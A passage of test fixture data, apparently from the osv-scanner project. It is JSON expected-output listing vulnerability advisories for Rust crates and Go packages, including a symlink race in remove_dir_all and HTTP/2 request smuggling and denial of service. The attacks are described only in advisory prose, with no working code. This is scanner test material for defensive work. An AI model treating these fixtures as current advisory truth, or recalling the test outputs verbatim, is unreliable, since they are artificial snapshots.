"time::OffsetDateTime::try_now_local" ] } } ], "references": [ { "type": "WEB", "url": "https://github.com/time-rs/time/security/advisories/GHSA-wcg3-cvx6-7396" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26235" }, { "type": "WEB", "url": "https://github.com/time-rs/time/issues/293" }, { "type": "WEB", "url": "https://crates.io/crates/time/0.2.23" }, { "type": "PACKAGE", "url": "https://github.com/time-rs/time" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" } ], "database_specific": { "cwe_ids": [ "CWE-476" ], "github_reviewed": true, "severity": "MODERATE" } }, { "schema_version": "1.4.0", "id": "RUSTSEC-2020-0071", "modified": "2023-02-08T15:06:38Z", "published": "2020-11-18T12:00:00Z", "aliases": [ "CVE-2020-26235" ], "summary": "Potential segfault in the time crate", "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nPending a proper fix, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods.\n\nUsers and library authors with time in their dependency tree should perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and should upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nA possible workaround for crates affected through the transitive dependency in `chrono`, is to avoid using the default `oldtime` feature dependency of the `chrono` crate by disabling its `default-features` and manually specifying the required features instead.\n\n#### Examples:\n\n`Cargo.toml`: \n\n```toml\nchrono = { version = \"0.4\", default-features = false, features = [\"serde\"] }\n```\n\n```toml\nchrono = { version = \"0.4.22\", default-features = false, features = [\"clock\"] }\n```\n\nCommandline: \n\n```bash\ncargo add chrono --no-default-features -F clock\n```\n\nSources: \n - [chronotope/chrono#602 (comment)](https://github.com/chronotope/chrono/issues/602#issuecomment-1242149249) \n - [vityafx/serde-aux#21](https://github.com/vityafx/serde-aux/issues/21)", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.2.0" }, { "introduced": "0.2.1-0" }, { "fixed": "0.2.1" }, { "introduced": "0.2.2-0" }, { "fixed": "0.2.2" }, { "introduced": "0.2.3-0" }, { "fixed": "0.2.3" }, { "introduced": "0.2.4-0" }, { "fixed": "0.2.4" }, { "introduced": "0.2.5-0" }, { "fixed": "0.2.5" }, { "introduced": "0.2.6-0" }, { "fixed": "0.2.6" }, { "introduced": "0.2.7-0" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "categories": [ "code-execution", "memory-corruption" ], "cvss": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2020-0071.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local", "time::UtcOffset::current_local_offset", "time::UtcOffset::local_offset_at", "time::UtcOffset::try_current_local_offset", "time::UtcOffset::try_local_offset_at", "time::at", "time::at_utc", "time::now" ], "os": [ "linux", "redox", "solaris", "android", "ios", "macos", "netbsd", "openbsd", "freebsd" ] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/time" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" }, { "type": "REPORT", "url": "https://github.com/time-rs/time/issues/293" } ] } ], "groups": [ { "ids": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ], "aliases": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ] } ] } ] }, { "source": { "path": "testdata/filter/none/configs/b/", "type": "lockfile" }, "packages": [ { "package": { "name": "golang.org/x/net", "version": "0.1.0", "ecosystem": "Go" }, "vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-fxg5-wq6x-vr4w", "modified": "2023-01-24T18:56:46Z", "published": "2023-01-14T00:30:23Z", "aliases": [ "CVE-2022-41721" ], "summary": "golang.org/x/net/http2/h2c vulnerable to request smuggling attack", "details": "A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/net/http2/h2c", "purl": "pkg:golang/golang.org/x/net/http2/h2c" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-20220524220425-1d687d428aca" }, { "fixed": "0.1.1-0.20221104162952-702349b0e862" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-fxg5-wq6x-vr4w/GHSA-fxg5-wq6x-vr4w.json" } }, { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-20220524220425-1d687d428aca" }, { "fixed": "0.1.1-0.20221104162952-702349b0e862" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-fxg5-wq6x-vr4w/GHSA-fxg5-wq6x-vr4w.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41721" }, { "type": "PACKAGE", "url": "https://cs.opensource.google/go/x/net" }, { "type": "WEB", "url": "https://go.dev/cl/447396" }, { "type": "WEB", "url": "https://go.dev/issue/56352" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1495" } ], "database_specific": { "cwe_ids": [ "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2023-01-20T22:40:06Z", "nvd_published_at": "2023-01-13T23:15:00Z", "severity": "HIGH" } }, { "schema_version": "1.4.0", "id": "GO-2023-1495", "modified": "2023-01-31T21:39:17Z", "published": "2023-01-13T22:39:40Z", "aliases": [ "CVE-2022-41721", "GHSA-fxg5-wq6x-vr4w" ], "summary": "", "details": "A request smuggling attack is possible when using MaxBytesHandler.\n\nWhen using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-20220524220425-1d687d428aca" }, { "fixed": "0.1.1-0.20221104162952-702349b0e862" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1495.json", "url": "https://pkg.go.dev/vuln/GO-2023-1495" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/net/http2/h2c", "symbols": [ "h2cHandler.ServeHTTP", "h2cUpgrade" ] } ] } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/56352" }, { "type": "FIX", "url": "https://go.dev/cl/447396" } ] }, { "schema_version": "1.4.0", "id": "GO-2022-1144", "modified": "2023-01-31T21:39:15Z", "published": "2022-12-08T19:01:21Z", "aliases": [ "CVE-2022-41717", "GHSA-xrjj-mj9h-534m" ], "summary": "", "details": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests.\n\nHTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", "affected": [ { "package": { "ecosystem": "Go", "name": "stdlib", "purl": "pkg:golang/stdlib" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.18.9" }, { "introduced": "1.19.0" }, { "fixed": "1.19.4" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2022-1144.json", "url": "https://pkg.go.dev/vuln/GO-2022-1144" }, "ecosystem_specific": { "imports": [ { "path": "net/http", "symbols": [ "ListenAndServe", "ListenAndServeTLS", "Serve", "ServeTLS", "Server.ListenAndServe", "Server.ListenAndServeTLS", "Server.Serve", "Server.ServeTLS", "http2Server.ServeConn", "http2serverConn.canonicalHeader" ] } ] } }, { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.4.0" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2022-1144.json", "url": "https://pkg.go.dev/vuln/GO-2022-1144" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/net/http2", "symbols": [ "Server.ServeConn", "serverConn.canonicalHeader" ] } ] } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/56350" }, { "type": "FIX", "url": "https://go.dev/cl/455717" }, { "type": "FIX", "url": "https://go.dev/cl/455635" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ" } ] }, { "schema_version": "1.4.0", "id": "GHSA-vvpx-j8f3-3w6h", "modified": "2023-03-09T21:20:44Z", "published": "2023-02-17T14:00:02Z", "aliases": [ "CVE-2022-41723" ], "summary": "Uncontrolled Resource Consumption", "details": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.7.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-vvpx-j8f3-3w6h/GHSA-vvpx-j8f3-3w6h.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723" }, { "type": "WEB", "url": "https://go.dev/cl/468135" }, { "type": "WEB", "url": "https://go.dev/cl/468295" }, { "type": "WEB", "url": "https://go.dev/issue/57855" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, { "type": "WEB", "url": "https://vuln.go.dev/ID/GO-2023-1571.json" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-02-17T14:00:02Z", "nvd_published_at": "2023-02-28T18:15:00Z", "severity": "HIGH" } }, { "schema_version": "1.4.0", "id": "GO-2023-1571", "modified": "2023-02-22T20:13:12Z", "published": "2023-02-16T22:31:36Z", "aliases": [ "CVE-2022-41723", "GHSA-vvpx-j8f3-3w6h" ], "summary": "", "details": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", "affected": [ { "package": { "ecosystem": "Go", "name": "stdlib", "purl": "pkg:golang/stdlib" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.19.6" }, { "introduced": "1.20.0" }, { "fixed": "1.20.1" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1571.json", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, "ecosystem_specific": { "imports": [ { "path": "net/http" } ] } }, { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.7.0" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1571.json", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/net/http2" }, { "path": "golang.org/x/net/http2/hpack", "symbols": [ "Decoder.DecodeFull", "Decoder.Write", "Decoder.parseFieldLiteral", "Decoder.readString" ] } ] } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/57855" }, { "type": "FIX", "url": "https://go.dev/cl/468135" }, { "type": "FIX", "url": "https://go.dev/cl/468295" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E" } ] } ], "groups": [ { "ids": [ "GHSA-fxg5-wq6x-vr4w", "GO-2023-1495" ], "aliases": [ "GHSA-fxg5-wq6x-vr4w", "GO-2023-1495" ] }, { "ids": [ "GO-2022-1144" ], "aliases": [ "GO-2022-1144" ] }, { "ids": [ "GHSA-vvpx-j8f3-3w6h", "GO-2023-1571" ], "aliases": [ "GHSA-vvpx-j8f3-3w6h", "GO-2023-1571" ] } ] } ] }, { "source": { "path": "testdata/filter/none/configs/c/", "type": "lockfile" }, "packages": [ { "package": { "name": "ascii", "version": "0.8.7", "ecosystem": "crates.io" }, "vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-mrrw-grhq-86gf", "modified": "2023-02-28T20:30:10Z", "published": "2023-02-28T20:30:10Z", "aliases": null, "summary": "Ascii (crate) allows out-of-bounds array indexing in safe code", "details": "Affected version of this crate had implementation of `From\u003c\u0026mut AsciiStr\u003e` for `\u0026mut [u8]` and `\u0026mut str`. This can result in out-of-bounds array indexing in safe code.\n\nThe flaw was corrected in commit [8a6c779](https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc) by removing those impls.\n", "affected": [ { "package": { "ecosystem": "crates.io", "name": "ascii", "purl": "pkg:cargo/ascii" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.6.0" }, { "fixed": "0.9.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-mrrw-grhq-86gf/GHSA-mrrw-grhq-86gf.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/tomprogrammer/rust-ascii/issues/64" }, { "type": "WEB", "url": "https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc" }, { "type": "PACKAGE", "url": "https://github.com/tomprogrammer/rust-ascii" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0015.html" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2023-02-28T20:30:10Z", "nvd_published_at": null, "severity": "MODERATE" } }, { "schema_version": "1.4.0", "id": "RUSTSEC-2023-0015", "modified": "2023-02-25T15:13:09Z", "published": "2023-02-25T12:00:00Z", "aliases": null, "summary": "Ascii allows out-of-bounds array indexing in safe code", "details": "Affected version of this crate had implementation of `From\u003c\u0026mut AsciiStr\u003e` for `\u0026mut [u8]` and `\u0026mut str`. This can result in out-of-bounds array indexing in safe code.\n\nThe flaw was corrected in commit [8a6c779](https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc) by removing those impls.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "ascii", "purl": "pkg:cargo/ascii" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.6.1-0" }, { "fixed": "0.9.3" } ] } ], "database_specific": { "categories": [ "memory-corruption" ], "cvss": null, "informational": "unsound", "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2023-0015.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [], "os": [] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/ascii" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0015.html" }, { "type": "REPORT", "url": "https://github.com/tomprogrammer/rust-ascii/issues/64" } ] } ], "groups": [ { "ids": [ "GHSA-mrrw-grhq-86gf" ], "aliases": [ "GHSA-mrrw-grhq-86gf" ] }, { "ids": [ "RUSTSEC-2023-0015" ], "aliases": [ "RUSTSEC-2023-0015" ] } ] }, { "package": { "name": "remove_dir_all", "version": "0.5.3", "ecosystem": "crates.io" }, "vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-mc8h-8q98-g5hr", "modified": "2023-02-24T16:23:59Z", "published": "2023-02-24T16:23:59Z", "aliases": null, "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU) Race Condition in remove_dir_all", "details": "The `remove_dir_all` crate is a Rust library that offers additional features over the Rust standard library `fs::remove_dir_all` function. It suffers the same class of failure as the code it was layering over: TOCTOU race conditions, with the ability to cause arbitrary paths to be deleted by substituting a symlink for a path after the type of the path was checked.\n\nThanks to the Rust security team for identifying the problem and alerting us to it.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.8.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-mc8h-8q98-g5hr/GHSA-mc8h-8q98-g5hr.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/security/advisories/GHSA-mc8h-8q98-g5hr" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "PACKAGE", "url": "https://github.com/XAMPPRocky/remove_dir_all" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" } ], "database_specific": { "cwe_ids": [ "CWE-366", "CWE-367" ], "github_reviewed": true, "github_reviewed_at": "2023-02-24T16:23:59Z", "nvd_published_at": null, "severity": "LOW" } }, { "schema_version": "1.4.0", "id": "RUSTSEC-2023-0018", "modified": "2023-03-04T21:50:30Z", "published": "2023-02-24T12:00:00Z", "aliases": [ "GHSA-mc8h-8q98-g5hr" ], "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU)", "details": "The remove_dir_all crate is a Rust library that offers additional features over the Rust\nstandard library fs::remove_dir_all function.\n\nIt was possible to trick a privileged process doing a recursive delete in an\nattacker controlled directory into deleting privileged files, on all operating systems.\n\nFor instance, consider deleting a tree called 'etc' in a parent directory\ncalled 'p'. Between calling `remove_dir_all(\"a\")` and remove_dir_all(\"a\")\nactually starting its work, the attacker can move 'p' to 'p-prime', and\nreplace 'p' with a symlink to '/'. Then the privileged process deletes 'p/etc'\nwhich is actually /etc, and now your system is broken. There are some\nmitigations for this exact scenario, such as CWD relative file lookup, but\nthey are not guaranteed - any code using absolute paths will not have that\nprotection in place.\n\nThe same attack could be performed at any point in the directory tree being\ndeleted: if 'a' contains a child directory called 'etc', attacking the\ndeletion by replacing 'a' with a link is possible.\n\nThe new code in this release mitigates the attack within the directory tree\nbeing deleted by using file-handle relative operations: to open 'a/etc', the\npath 'etc' relative to 'a' is opened, where 'a' is represented by a file\ndescriptor (Unix) or handle (Windows). With the exception of the entry points\ninto the directory deletion logic, this is robust against manipulation of the\ndirectory hierarchy, and remove_dir_all will only delete files and directories\ncontained in the tree it is deleting.\n\nThe entry path however is a challenge - as described above, there are some\npotential mitigations, but since using them must be done by the calling code,\nit is hard to be confident about the security properties of the path based\ninterface.\n\nThe new extension trait `RemoveDir` provides an interface where it is much\nharder to get it wrong.\n\n`somedir.remove_dir_contents(\"name-of-child\")`.\n\nCallers can then make their own security evaluation about how to securely get\na directory handle. That is still not particularly obvious, and we're going to\nfollow up with a helper of some sort (probably in the `fs_at` crate). Once\nthat is available, the path based entry points will get deprecated.\n\nIn the interim, processes that might run with elevated privileges should\nfigure out how to securely identify the directory they are going to delete, to\navoid the initial race. Pragmatically, other processes should be fine with the\npath based entry points : this is the same interface `std::fs::remove_dir_all`\noffers, and an unprivileged process running in an attacker controlled\ndirectory can't do anything that the attacker can't already do.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.8.0" } ] } ], "database_specific": { "categories": [], "cvss": null, "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2023-0018.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "remove_dir_all::ensure_empty_dir", "remove_dir_all::remove_dir_all", "remove_dir_all::remove_dir_contents" ], "os": [] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/remove_dir_all" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-mc8h-8q98-g5hr" } ] } ], "groups": [ { "ids": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ], "aliases": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ] } ] }, { "package": { "name": "time", "version": "0.1.45", "ecosystem": "crates.io" }, "vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-wcg3-cvx6-7396", "modified": "2022-12-06T00:16:25Z", "published": "2021-08-25T20:56:46Z", "aliases": [ "CVE-2020-26235" ], "summary": "Segmentation fault in time", "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nIn some versions of `time`, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods. In later versions, `time` will attempt to determine the number of threads running in the process. If the process is single-threaded, the call will proceed as its safety invariant is upheld.\n\nUsers and library authors with time in their dependency tree must perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and must upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nLibrary authors must ensure that the program only has one running thread at the time of calling any affected method. Binary authors may do the same and/or ensure that no other thread is actively mutating the environment.\n\n### References\n\n[time-rs/time#293](https://github.com/time-rs/time/issues/293).", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.1" }, { "last_affected": "0.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" } }, { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.2.7" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" }, "ecosystem_specific": { "affected_functions": [ "time::UtcOffset::local_offset_at", "time::UtcOffset::try_local_offset_at", "time::UtcOffset::current_local_offset", "time::UtcOffset::try_current_local_offset", "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local" ] } } ], "references": [ { "type": "WEB", "url": "https://github.com/time-rs/time/security/advisories/GHSA-wcg3-cvx6-7396" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26235" }, { "type": "WEB", "url": "https://github.com/time-rs/time/issues/293" }, { "type": "WEB", "url": "https://crates.io/crates/time/0.2.23" }, { "type": "PACKAGE", "url": "https://github.com/time-rs/time" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" } ], "database_specific": { "cwe_ids": [ "CWE-476" ], "github_reviewed": true, "severity": "MODERATE" } }, { "schema_version": "1.4.0", "id": "RUSTSEC-2020-0071", "modified": "2023-02-08T15:06:38Z", "published": "2020-11-18T12:00:00Z", "aliases": [ "CVE-2020-26235" ], "summary": "Potential segfault in the time crate", "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nPending a proper fix, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods.\n\nUsers and library authors with time in their dependency tree should perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and should upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nA possible workaround for crates affected through the transitive dependency in `chrono`, is to avoid using the default `oldtime` feature dependency of the `chrono` crate by disabling its `default-features` and manually specifying the required features instead.\n\n#### Examples:\n\n`Cargo.toml`: \n\n```toml\nchrono = { version = \"0.4\", default-features = false, features = [\"serde\"] }\n```\n\n```toml\nchrono = { version = \"0.4.22\", default-features = false, features = [\"clock\"] }\n```\n\nCommandline: \n\n```bash\ncargo add chrono --no-default-features -F clock\n```\n\nSources: \n - [chronotope/chrono#602 (comment)](https://github.com/chronotope/chrono/issues/602#issuecomment-1242149249) \n - [vityafx/serde-aux#21](https://github.com/vityafx/serde-aux/issues/21)", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.2.0" }, { "introduced": "0.2.1-0" }, { "fixed": "0.2.1" }, { "introduced": "0.2.2-0" }, { "fixed": "0.2.2" }, { "introduced": "0.2.3-0" }, { "fixed": "0.2.3" }, { "introduced": "0.2.4-0" }, { "fixed": "0.2.4" }, { "introduced": "0.2.5-0" }, { "fixed": "0.2.5" }, { "introduced": "0.2.6-0" }, { "fixed": "0.2.6" }, { "introduced": "0.2.7-0" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "categories": [ "code-execution", "memory-corruption" ], "cvss": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2020-0071.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local", "time::UtcOffset::current_local_offset", "time::UtcOffset::local_offset_at", "time::UtcOffset::try_current_local_offset", "time::UtcOffset::try_local_offset_at", "time::at", "time::at_utc", "time::now" ], "os": [ "linux", "redox", "solaris", "android", "ios", "macos", "netbsd", "openbsd", "freebsd" ] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/time" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" }, { "type": "REPORT", "url": "https://github.com/time-rs/time/issues/293" } ] } ], "groups": [ { "ids": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ], "aliases": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ] } ] } ] } ] } ================================================ FILE: pkg/osvscanner/testdata/filter/none/want.json ================================================ { "results": [ { "source": { "path": "testdata/filter/none/configs/a/", "type": "lockfile" }, "packages": [ { "package": { "name": "remove_dir_all", "version": "0.5.3", "ecosystem": "crates.io" }, "vulnerabilities": [ { "modified": "2023-02-24T16:23:59Z", "published": "2023-02-24T16:23:59Z", "schema_version": "1.4.0", "id": "GHSA-mc8h-8q98-g5hr", "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU) Race Condition in remove_dir_all", "details": "The `remove_dir_all` crate is a Rust library that offers additional features over the Rust standard library `fs::remove_dir_all` function. It suffers the same class of failure as the code it was layering over: TOCTOU race conditions, with the ability to cause arbitrary paths to be deleted by substituting a symlink for a path after the type of the path was checked.\n\nThanks to the Rust security team for identifying the problem and alerting us to it.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.8.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-mc8h-8q98-g5hr/GHSA-mc8h-8q98-g5hr.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/security/advisories/GHSA-mc8h-8q98-g5hr" }, { "type": "WEB", 